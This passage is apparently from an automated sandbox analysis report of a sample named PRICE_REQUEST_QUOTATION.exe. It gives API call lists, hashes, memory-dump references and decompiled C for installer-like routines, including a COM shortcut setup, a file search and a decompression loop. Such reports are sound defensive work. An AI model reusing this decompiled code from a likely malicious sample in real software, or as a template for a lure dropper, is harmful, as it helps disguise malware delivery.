lstrcatA.KERNEL32(?,TclpOwkq), ref: 00404434
SetDlgItemTextA.USER32 ref: 00404446

Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F

Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3

GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F

Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00404411
TclpOwkq, xrefs: 00404422, 00404427, 00404432
A, xrefs: 004043E4

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$TclpOwkq
API String ID: 2624150263-3768769761
Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E00405727(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040205c
0x00402066
0x0040206f
0x00402079
0x00402082
0x0040208c
0x00402090
0x00402090
0x00402095
0x004020a6
0x004020ae
0x0040218e
0x0040218e
0x00402195
0x004020b4
0x004020b4
0x004020c5
0x004020c9
0x004020cf
0x004020d9
0x004020db
0x004020e6
0x004020e9
0x004020f6
0x004020f8
0x004020fa
0x00402101
0x00402104
0x00402104
0x00402107
0x00402111
0x00402119
0x0040211e
0x0040212a
0x0040212a
0x0040212d
0x00402136
0x00402139
0x00402142
0x00402147
0x00402159
0x00402168
0x0040216a
0x00402176
0x00402176
0x00402168
0x00402178
0x0040217e
0x0040217e
0x00402181
0x00402187
0x0040218c
0x004021a1
0x00000000
0x00000000
0x00000000
0x0040218c
0x00402197
0x004028c1
0x004028cd

APIs

CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004020DE

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-1943935188
Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405B25(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405BC7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402689
0x0040269d
0x004026a8
0x004026a9
0x004027e4
0x0040268b
0x0040268b
0x0040268d
0x0040268f
0x0040268f
0x004028c1
0x004028cd

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406354, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406354(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406AC3( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4073e8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4073e8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42dbb8;
												if( *0x42dbb8 != 0) {
													L22:
													_t412 =  *0x40942c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42ca34; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42ca30; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42ca38;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42ceb8;
													if(_t416 < 0x42ceb8) {
														L15:
														__eflags = _t416 - 0x42cc74;
														_t438 = 8;
														if(_t416 > 0x42cc74) {
															__eflags = _t416 - 0x42ce38;
															if(_t416 >= 0x42ce38) {
																__eflags = _t416 - 0x42ce98;
																if(_t416 < 0x42ce98) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42ca38, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42ca38 + _t440;
														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
														 *0x42dbb8 =  *0x42dbb8 + 1;
														__eflags =  *0x42dbb8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
